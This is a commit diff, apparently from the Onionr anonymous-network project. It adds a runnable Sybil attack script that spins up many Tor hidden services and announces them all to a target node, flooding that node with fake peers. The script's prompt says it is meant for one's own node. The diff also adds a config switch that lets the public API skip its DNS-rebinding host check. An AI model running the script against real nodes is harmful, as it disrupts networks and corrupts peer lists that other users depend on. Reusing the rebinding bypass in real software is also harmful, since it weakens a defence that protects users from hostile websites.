implemented the sybil attack script

scripts/sybil-attack.py

@@ -15,12 +15,26 @@ onionr_port = int(input("Enter onionr public api port: "))
 
 controller = Controller.from_port('127.0.0.1', int(input("Enter tor controller port: ")))
 controller.authenticate()
-for i in range(10):
-    response = controller.create_ephemeral_hidden_service({80: f'{onionr_ip}:{onionr_port}'}, await_publication=True)
-    print(response.service_id)
 
-
+node = input("Enter node to attack. Note that you legally must use your own, and even that might lead to technical or legal issues: ")
-
-node = input("Enter node to attack. Note that you legally must use your own, and even that might lead to technical or legal issues")
 assert stringvalidators.validate_transport(node)
 
+socks = input("Socks:")
+
+adders = set([])
+for i in range(int(input("Sybil addresses: "))):
+    response = controller.create_ephemeral_hidden_service({80: f'{onionr_ip}:{onionr_port}'}, await_publication=True)
+    #print(i, response.service_id)
+    adders.add(response.service_id)
+
+
+for x in adders:
+    x += '.onion'
+    print(f"Introducing {x} to {node}")
+    basicrequests.do_post_request(
+                    f'http://{node}/announce',
+                    data = {'node': x},
+                    port=socks)
+
+
+

src/httpapi/security/public.py

@@ -40,7 +40,9 @@ class PublicAPISecurity:
 
             if request.host not in transports:
                 # Abort conn if wrong HTTP hostname, to prevent DNS rebinding
-                abort(403)
+                if not public_api.config.get(
+                        'general.allow_public_api_dns_rebinding', False):
+                    abort(403)
             public_api.hitCount += 1  # raise hit count for valid requests
             try:
                 if 'onionr' in request.headers['User-Agent'].lower():